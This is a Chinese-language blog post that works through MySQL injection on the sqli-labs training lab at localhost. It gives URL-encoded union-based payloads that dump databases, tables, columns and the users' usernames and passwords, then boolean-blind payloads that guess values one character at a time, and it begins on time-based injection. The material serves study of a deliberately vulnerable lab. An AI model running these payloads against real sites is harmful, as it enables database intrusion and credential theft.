<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="sql注入," />










<meta name="description" content="本篇基于注入天书的例子进行总结 前几天无聊看到学校群里的新生曾讨论过sql注入 突然想到自己对sql注入的理解也是比较浅的层面 所以才想总结一下 注入较杂 较乱 水平有限不足之处还望师傅们指点。">
<meta name="keywords" content="sql注入">
<meta property="og:type" content="article">
<meta property="og:title" content="基于注入天书的mysql注入总结">
<meta property="og:url" content="http://yoursite.com/2019/03/10/基于注入天书的mysql注入总结/index.html">
<meta property="og:site_name" content="书生 - Blog">
<meta property="og:description" content="本篇基于注入天书的例子进行总结 前几天无聊看到学校群里的新生曾讨论过sql注入 突然想到自己对sql注入的理解也是比较浅的层面 所以才想总结一下 注入较杂 较乱 水平有限不足之处还望师傅们指点。">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://i.loli.net/2019/03/10/5c84cc486773d.jpg">
<meta property="og:image" content="https://i.loli.net/2019/03/11/5c864d60e0dd5.png">
<meta property="og:image" content="https://i.loli.net/2019/03/11/5c8648ace9cdf.png">
<meta property="og:image" content="https://i.loli.net/2019/03/13/5c88d78808b5a.gif">
<meta property="og:image" content="https://i.loli.net/2019/03/15/5c8b61d4df35d.png">
<meta property="og:updated_time" content="2019-03-17T12:48:57.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="基于注入天书的mysql注入总结">
<meta name="twitter:description" content="本篇基于注入天书的例子进行总结 前几天无聊看到学校群里的新生曾讨论过sql注入 突然想到自己对sql注入的理解也是比较浅的层面 所以才想总结一下 注入较杂 较乱 水平有限不足之处还望师傅们指点。">
<meta name="twitter:image" content="https://i.loli.net/2019/03/10/5c84cc486773d.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2019/03/10/基于注入天书的mysql注入总结/"/>





  <title>基于注入天书的mysql注入总结 | 书生 - Blog</title>
  








</head>

<body itemscope itemtype="https://github.com/scholar10" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
	<a href="https://github.com/scholar10" class="github-corner" target="_blank" title="Follow me on GitHub" aria-label="Follow me on GitHub">
      <svg width="80" height="80" viewBox="0 0 250 250" style="fill:#222; color:#fff; position: absolute; top: 0; border: 0; right: 0;" aria-hidden="true">
        <path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path>
    <path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"></path>
      </svg>
</a>
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">书生 - Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">一日三省，且温故知新</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-首页">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-关于">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-标签">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-分类">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-归档">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off"
             placeholder="搜索..." spellcheck="false"
             type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/03/10/基于注入天书的mysql注入总结/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="scholar(书生)">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/1.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="书生 - Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">基于注入天书的mysql注入总结</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-03-10T16:28:44+08:00">
                2019-03-10
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/web安全/" itemprop="url" rel="index">
                    <span itemprop="name">web安全</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p><img src="https://i.loli.net/2019/03/10/5c84cc486773d.jpg" alt="1.jpg"></p>
<p>本篇基于注入天书的例子进行总结</p>
<p>前几天无聊看到学校群里的新生曾讨论过sql注入 突然想到自己对sql注入的理解也是比较浅的层面 所以才想总结一下 注入较杂 较乱 水平有限不足之处还望师傅们指点。</p>
<a id="more"></a>
<h2 id="MySql系统函数"><a href="#MySql系统函数" class="headerlink" title="MySql系统函数"></a>MySql系统函数</h2><p>注入前我们先了解一下mysql常用的系统函数 这些函数往往起到 信息收集的目的</p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="title">ersion</span><span class="params">()</span></span>            MySQL版本</span><br><span class="line"><span class="function"><span class="title">user</span><span class="params">()</span></span>               数据库用户名</span><br><span class="line"><span class="function"><span class="title">database</span><span class="params">()</span></span>           数据库名</span><br><span class="line">@@datadir            数据库路径</span><br><span class="line">@@version_compile_os 操作系统版本</span><br></pre></td></tr></table></figure>
<h2 id="基本的联合注入"><a href="#基本的联合注入" class="headerlink" title="基本的联合注入"></a>基本的联合注入</h2><p>information_schema这张数据表保存了MySQL服务器所有数据库的信息。如数据库名，数据库的表，表栏的数据类型与访问权限等。</p>
<p>再简单点，这台MySQL服务器上，到底有哪些数据库、各个数据库有哪些表，每张表的字段类型是什么，各个数据库要什么权限才能访问，等等信息都保存在information_schema表里面。</p>
<p>这里拿sqli第一关来进行实验</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="regexp">//</span>localhost<span class="regexp">/sqli-labs/</span>Less-<span class="number">1</span><span class="regexp">/?id=1'</span></span><br></pre></td></tr></table></figure>
<p>我们看一下源码里的查询语句 前面单引号我们应该闭合 后面我们可以用–+来注释<br><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">http</span>://localhost/sqli-labs/Less-1/?id=1<span class="number">%27</span>order<span class="number">%20</span>by<span class="number">%203</span>--+</span><br></pre></td></tr></table></figure></p>
<p>接下里思路就比较常规了</p>
<h3 id="查询所有数据库"><a href="#查询所有数据库" class="headerlink" title="查询所有数据库"></a>查询所有数据库</h3><figure class="highlight llvm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/sqli-labs/Less<span class="number">-1</span>/?id=<span class="number">-1</span><span class="symbol">%27</span>union<span class="symbol">%20</span><span class="keyword">select</span><span class="symbol">%201</span>,group_concat(schema_name),<span class="number">3</span><span class="symbol">%20</span>from<span class="symbol">%20</span>information_schema.schemata--+</span><br></pre></td></tr></table></figure>
<h3 id="查询当前数据库"><a href="#查询当前数据库" class="headerlink" title="查询当前数据库"></a>查询当前数据库</h3><figure class="highlight llvm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/sqli-labs/Less<span class="number">-1</span>/?id=<span class="number">-1</span><span class="symbol">%27</span><span class="symbol">%20</span>union<span class="symbol">%20</span><span class="keyword">select</span><span class="symbol">%201</span>,database(),<span class="number">3</span>--+</span><br></pre></td></tr></table></figure>
<h3 id="查询数据库下的表名"><a href="#查询数据库下的表名" class="headerlink" title="查询数据库下的表名"></a>查询数据库下的表名</h3><figure class="highlight llvm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/sqli-labs/Less<span class="number">-1</span>/?id=<span class="number">-1</span><span class="symbol">%27</span><span class="symbol">%20</span>union<span class="symbol">%20</span><span class="keyword">select</span><span class="symbol">%201</span>,group_concat(table_name),<span class="number">3</span><span class="symbol">%20</span>from<span class="symbol">%20</span>information_schema.tables<span class="symbol">%20</span>where<span class="symbol">%20</span>table_schema=<span class="symbol">%22</span>security<span class="symbol">%22</span>--+</span><br></pre></td></tr></table></figure>
<h3 id="爆user表下的列"><a href="#爆user表下的列" class="headerlink" title="爆user表下的列"></a>爆user表下的列</h3><figure class="highlight llvm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/sqli-labs/Less<span class="number">-1</span>/?id=<span class="number">-1</span><span class="symbol">%27</span><span class="symbol">%20</span>union<span class="symbol">%20</span><span class="keyword">select</span><span class="symbol">%201</span>,group_concat(column_name),<span class="number">3</span><span class="symbol">%20</span>from<span class="symbol">%20</span>information_schema.columns<span class="symbol">%20</span>where<span class="symbol">%20</span>table_schema=<span class="symbol">%22</span>security<span class="symbol">%22</span><span class="symbol">%20</span><span class="keyword">and</span><span class="symbol">%20</span>table_name=<span class="symbol">%22</span>users<span class="symbol">%22</span>--+</span><br></pre></td></tr></table></figure>
<h3 id="爆数据"><a href="#爆数据" class="headerlink" title="爆数据"></a>爆数据</h3><figure class="highlight llvm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/sqli-labs/Less<span class="number">-1</span>/?id=<span class="number">-1</span><span class="symbol">%27</span><span class="symbol">%20</span>union<span class="symbol">%20</span><span class="keyword">select</span><span class="symbol">%201</span>,group_concat(id,username,password),<span class="number">3</span><span class="symbol">%20</span>from<span class="symbol">%20</span>users--+</span><br></pre></td></tr></table></figure>
<p>Less 1-4都是可以用类似的payload来注出数据的</p>
<p>唯一不同的是 </p>
<p>less2对没有对参数进行处理payload 与 less1 中一直，只需要将 less1 中的 ‘ 去掉即可。</p>
<p>less3对参数进行了’ ‘ （ ）的包装 只需要将 less1 中的 ‘ 添加） 即 ’) 即可</p>
<p>less4对参数进行了” “（ ）的包装 只需要将 less1 中的 ‘ 改为  “) 即可</p>
<h2 id="盲注"><a href="#盲注" class="headerlink" title="盲注"></a>盲注</h2><p>盲注是在sql语句执行后 数据不能返回到前端页面 不能回显</p>
<p>此时，我们需要利用一些方法进行判断或者尝试，这个过程称之为盲注。</p>
<p>注入天书上讲盲注也分为三类</p>
<ul>
<li>基于布尔的sql盲注</li>
<li>基于时间的sql盲注</li>
<li>基于报错的sql盲注</li>
</ul>
<h3 id="截取字符串常用函数"><a href="#截取字符串常用函数" class="headerlink" title="截取字符串常用函数"></a>截取字符串常用函数</h3><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="title">count</span><span class="params">()</span></span> 计算总数</span><br></pre></td></tr></table></figure>
<figure class="highlight livecodeserver"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">mid</span>(coulumn_name,<span class="built_in">start</span>,<span class="built_in">length</span>)</span><br></pre></td></tr></table></figure>
<p>​    mid(database(),1,1)&gt;’a’,查看数据库名第一位，</p>
<p>​    mid(database(),2,1)查看数据库名第二位，依次查看各位字符。</p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="title">Substr</span><span class="params">(a,b,c)</span></span>参数同mid函数一样</span><br></pre></td></tr></table></figure>
<p>​    从 b 位置开始，截取字符串 a 的 c 长度。</p>
<p>​    substr(database()1,1)</p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="title">Left</span><span class="params">()</span></span>得到字符串左部指定个数的字符</span><br></pre></td></tr></table></figure>
<p>​    Left ( a, b )        从左侧截取a的前b位。</p>
<p>​    left(database(),1)&gt;’a’,查看数据库名第一位，left(database(),2)&gt;’ab’,查看数据库    名前二位</p>
<figure class="highlight excel"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ascii(substr((select table_name information_schema.tables where tables_schema</span><br><span class="line">=database()limit <span class="number">0</span>,<span class="number">1</span>),<span class="number">1</span>,<span class="number">1</span>))=<span class="number">101</span> --+ //substr()函数，ascii()函数</span><br></pre></td></tr></table></figure>
<p>截取当前数据库下所有表名的 第一个表的 名字的第一位是否为ascii编码101(ascii编码101为字母e 也就是第一位是否为e)</p>
<h3 id="布尔盲注"><a href="#布尔盲注" class="headerlink" title="布尔盲注"></a>布尔盲注</h3><p>sqli第五关来做实例</p>
<p>与联合查询有所不同联合查询上来就可以database爆出数据库名</p>
<p>盲注的话我们应该先猜数据库长度</p>
<h4 id="数据库的长度"><a href="#数据库的长度" class="headerlink" title="数据库的长度"></a>数据库的长度</h4><figure class="highlight livecodeserver"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">http</span>://<span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span>/sqli-labs/less<span class="number">-5</span>/?id=<span class="number">1</span>%<span class="number">27</span><span class="keyword">and</span>%<span class="number">20</span><span class="built_in">length</span>(database())=<span class="number">8</span><span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p>上面长度为8时界面Ture说明数据库长度为8</p>
<p>有了长度以后才应该去猜数据库名</p>
<h4 id="数据库名"><a href="#数据库名" class="headerlink" title="数据库名"></a>数据库名</h4><figure class="highlight livecodeserver"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">http</span>://<span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span>/sqli-labs/less<span class="number">-5</span>/?id=<span class="number">1</span>%<span class="number">27</span><span class="keyword">and</span>%<span class="number">20</span>ascii(substr(database(),<span class="number">1</span>,<span class="number">1</span>))=<span class="number">115</span><span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p>判断数据库名的第一位是否等于s(这里把s进行了ascii码转换可以更快且更方便的猜出数据)</p>
<p>以此类推来猜测数据库名第二位</p>
<figure class="highlight livecodeserver"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">http</span>://<span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span>/sqli-labs/less<span class="number">-5</span>/?id=<span class="number">1</span>%<span class="number">27</span><span class="keyword">and</span>%<span class="number">20</span>ascii(substr(database(),<span class="number">2</span>,<span class="number">1</span>))=<span class="number">101</span><span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p>感觉太磨叽 额。。。依次类推猜出数据库名为<code>security</code></p>
<h4 id="表名"><a href="#表名" class="headerlink" title="表名"></a>表名</h4><p>获取表名之前 首先应该知道数据库下表的数量 方便后面来猜表名</p>
<figure class="highlight llvm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://<span class="number">127.0</span>.<span class="number">0.1</span>/sqli-labs/less<span class="number">-5</span>/?id=<span class="number">1</span><span class="symbol">%27</span><span class="keyword">and</span><span class="symbol">%20</span>(<span class="keyword">select</span><span class="symbol">%20</span>count(table_name)from<span class="symbol">%20</span>information_schema.tables<span class="symbol">%20</span>where<span class="symbol">%20</span>table_schema=database())=<span class="number">4</span>--+</span><br></pre></td></tr></table></figure>
<p>当前数据库下的表的个数有4个</p>
<p>步骤应该很清晰</p>
<p>知道了有4个表接下来 我们来猜一下每个表的长度</p>
<figure class="highlight llvm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://<span class="number">127.0</span>.<span class="number">0.1</span>/sqli-labs/less<span class="number">-5</span>/?id=<span class="number">1</span><span class="symbol">%27</span><span class="keyword">and</span><span class="symbol">%20</span>(<span class="keyword">select</span><span class="symbol">%20</span>length(table_name)from<span class="symbol">%20</span>information_schema.tables<span class="symbol">%20</span>where<span class="symbol">%20</span>table_schema=database()limit<span class="symbol">%200</span>,<span class="number">1</span>)=<span class="number">6</span>--+</span><br></pre></td></tr></table></figure>
<p>等于6时返回正常可知第一个表长度为6</p>
<p>这里可以看到我们上述的语句中使用的 limit 0,1. 意思就是从第 0 个开始，获取第一个。那<br>要获取第二个是不是就是 limit 1,1！</p>
<p>所以获取第二个表的长度为</p>
<figure class="highlight llvm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://<span class="number">127.0</span>.<span class="number">0.1</span>/sqli-labs/less<span class="number">-5</span>/?id=<span class="number">1</span><span class="symbol">%27</span><span class="keyword">and</span><span class="symbol">%20</span>(<span class="keyword">select</span><span class="symbol">%20</span>length(table_name)from<span class="symbol">%20</span>information_schema.tables<span class="symbol">%20</span>where<span class="symbol">%20</span>table_schema=database()limit<span class="symbol">%201</span>,<span class="number">1</span>)=<span class="number">8</span>--+</span><br></pre></td></tr></table></figure>
<p>第三个，四个类似</p>
<p>至此可以获取四个表每个表的长度</p>
<p>接下来猜第一个表名的第一个字符</p>
<figure class="highlight llvm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://<span class="number">127.0</span>.<span class="number">0.1</span>/sqli-labs/less<span class="number">-5</span>/?id=<span class="number">1</span><span class="symbol">%27</span><span class="keyword">and</span><span class="symbol">%20</span>ascii(substr((<span class="keyword">select</span><span class="symbol">%20</span>table_name<span class="symbol">%20</span>from<span class="symbol">%20</span>information_schema.tables<span class="symbol">%20</span>where<span class="symbol">%20</span>table_schema=database()limit<span class="symbol">%200</span>,<span class="number">1</span>),<span class="number">1</span>,<span class="number">1</span>))=<span class="number">101</span>--+</span><br></pre></td></tr></table></figure>
<p>第一个表第二个字符</p>
<figure class="highlight llvm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://<span class="number">127.0</span>.<span class="number">0.1</span>/sqli-labs/less<span class="number">-5</span>/?id=<span class="number">1</span><span class="symbol">%27</span><span class="keyword">and</span><span class="symbol">%20</span>ascii(substr((<span class="keyword">select</span><span class="symbol">%20</span>table_name<span class="symbol">%20</span>from<span class="symbol">%20</span>information_schema.tables<span class="symbol">%20</span>where<span class="symbol">%20</span>table_schema=database()limit<span class="symbol">%200</span>,<span class="number">1</span>),<span class="number">2</span>,<span class="number">1</span>))=<span class="number">109</span>--+</span><br></pre></td></tr></table></figure>
<p>上面提到了<code>limit</code> 所以猜测第二个表的第一个字符的话</p>
<p><code>limit 1,1</code></p>
<figure class="highlight llvm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://<span class="number">127.0</span>.<span class="number">0.1</span>/sqli-labs/less<span class="number">-5</span>/?id=<span class="number">1</span><span class="symbol">%27</span><span class="keyword">and</span><span class="symbol">%20</span>ascii(substr((<span class="keyword">select</span><span class="symbol">%20</span>table_name<span class="symbol">%20</span>from<span class="symbol">%20</span>information_schema.tables<span class="symbol">%20</span>where<span class="symbol">%20</span>table_schema=database()limit<span class="symbol">%201</span>,<span class="number">1</span>),<span class="number">1</span>,<span class="number">1</span>))=<span class="number">114</span>--+</span><br></pre></td></tr></table></figure>
<p>后面依次类推</p>
<p>到这里我们就获取到了<code>security</code>数据库下 也就是当前数据库下的所有表名</p>
<p><img src="https://i.loli.net/2019/03/11/5c864d60e0dd5.png" alt="屏幕快照 2019-03-11 下午7.58.11.png"></p>
<h4 id="列名"><a href="#列名" class="headerlink" title="列名"></a>列名</h4><p>来看users表下的列</p>
<p>首先还是和表类似猜测users表下列的个数</p>
<figure class="highlight llvm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://<span class="number">127.0</span>.<span class="number">0.1</span>/sqli-labs/less<span class="number">-5</span>/?id=<span class="number">1</span><span class="symbol">%27</span><span class="keyword">and</span><span class="symbol">%20</span>(<span class="keyword">select</span><span class="symbol">%20</span>count(column_name)from<span class="symbol">%20</span>information_schema.columns<span class="symbol">%20</span>where<span class="symbol">%20</span>table_schema=database()<span class="symbol">%20</span><span class="keyword">and</span><span class="symbol">%20</span>table_name=<span class="symbol">%22</span>users<span class="symbol">%22</span>)=<span class="number">3</span>--+</span><br></pre></td></tr></table></figure>
<p>等于3返回正常判断出有三列</p>
<p>套路是一样的还是判断</p>
<p>第一个列的长度</p>
<figure class="highlight llvm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://<span class="number">127.0</span>.<span class="number">0.1</span>/sqli-labs/less<span class="number">-5</span>/?id=<span class="number">1</span><span class="symbol">%27</span><span class="keyword">and</span><span class="symbol">%20</span>(<span class="keyword">select</span><span class="symbol">%20</span>length(column_name)from<span class="symbol">%20</span>information_schema.columns where table_schema=database() <span class="keyword">and</span> table_name=<span class="string">"users"</span> limit<span class="symbol">%200</span>,<span class="number">1</span>)=<span class="number">2</span>--+</span><br></pre></td></tr></table></figure>
<p>第二个三个同上面表明一样 <code>limit 1,1</code> <code>limit 2,1</code>即可</p>
<p>第一个列的第一个字符</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/sqli-labs/less-5/?id=1'and ascii(substr((<span class="keyword">select</span> column_name <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_schema=<span class="keyword">database</span>() <span class="keyword">and</span> table_name=<span class="string">"users"</span><span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span>),<span class="number">1</span>,<span class="number">1</span>))=<span class="number">105</span><span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p>后面就不多写了 都是一样的东西（懒得写）</p>
<p>后可得 <code>users</code>表下的列</p>
<ul>
<li>id</li>
<li>username</li>
<li>password</li>
</ul>
<h4 id="数据"><a href="#数据" class="headerlink" title="数据"></a>数据</h4><p>得到列首先判断users表中有多少条记录</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/sqli-labs/less-5/?id=1'and (<span class="keyword">select</span> <span class="keyword">count</span>(*) <span class="keyword">from</span> <span class="keyword">users</span>)=<span class="number">13</span><span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p>判断出users表里13条数据信息</p>
<p>下图 是users表下的内容 </p>
<p>对比笔记看起来更直观吧</p>
<p><img src="https://i.loli.net/2019/03/11/5c8648ace9cdf.png" alt="屏幕快照 2019-03-11 下午7.37.59.png"></p>
<p>紧着着判断 13条数据第一条数据的长度</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/sqli-labs/less-5/?id=1'and (<span class="keyword">select</span> <span class="keyword">length</span>(username) <span class="keyword">from</span> <span class="keyword">users</span> <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span>)=<span class="number">4</span> <span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/sqli-labs/less-5/?id=1'and (<span class="keyword">select</span> <span class="keyword">length</span>(<span class="keyword">password</span>) <span class="keyword">from</span> <span class="keyword">users</span> <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span>)=<span class="number">4</span> <span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p>后面还是依次类推</p>
<p>这样就获取到了13条数据的长度</p>
<p>累死了。。。。</p>
<p>最后就是猜数据里的内容了</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/sqli-labs/less-5/?id=1'and ascii(substr((<span class="keyword">select</span> username <span class="keyword">from</span> <span class="keyword">users</span> <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span>),<span class="number">1</span>,<span class="number">1</span>))=<span class="number">68</span> <span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p>第一条username列下的数据</p>
<p>不说了还是重复造轮子 到这里就能猜出了</p>
<p>13条数据的所有内容喽。。。</p>
<h3 id="延时注入"><a href="#延时注入" class="headerlink" title="延时注入"></a>延时注入</h3><p>延时注入 和布尔注入感觉差别并不大 但是为什么还要学 延时注入</p>
<p>这是因为某些注入点 你输入什么它返回的都是一样的东西 和程序员写的源码有关</p>
<p>这时候布尔注入算是废了 转用延时注入 语法上差别是不大的 </p>
<p>if(条件判断,True,False)</p>
<p>Sleep(5)表示延时五秒</p>
<p>当前数据库长度</p>
